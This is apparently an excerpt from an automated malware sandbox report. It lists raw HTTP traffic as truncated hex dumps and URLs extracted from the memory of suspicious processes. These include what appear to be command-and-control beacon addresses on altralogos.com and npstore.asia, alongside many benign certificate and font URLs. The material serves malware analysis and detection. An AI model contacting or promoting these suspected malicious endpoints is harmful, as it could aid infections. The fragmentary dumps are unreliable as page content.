4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:53:05 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:53:07 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: isoburn.exe, 00000004.00000002.4122089347.00000000061CC000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003C5C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005086000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002B16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2011901492.00000000388F6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: isoburn.exe, 00000004.00000002.4122089347.00000000053AA000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002E3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parkcloud.dynadot.com/logo.gif
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: isoburn.exe, 00000004.00000002.4122089347.00000000053AA000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002E3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.dynadot.com
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4122987112.0000000004ABE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.npstore.asia
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4122987112.0000000004ABE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.npstore.asia/ahec/
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686390703.0000000005980000.00000004.00000020.00020000.00000000.sdmp, WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
            Source: isoburn.exe, 00000004.00000002.4122089347.00000000059F2000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003482000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.css
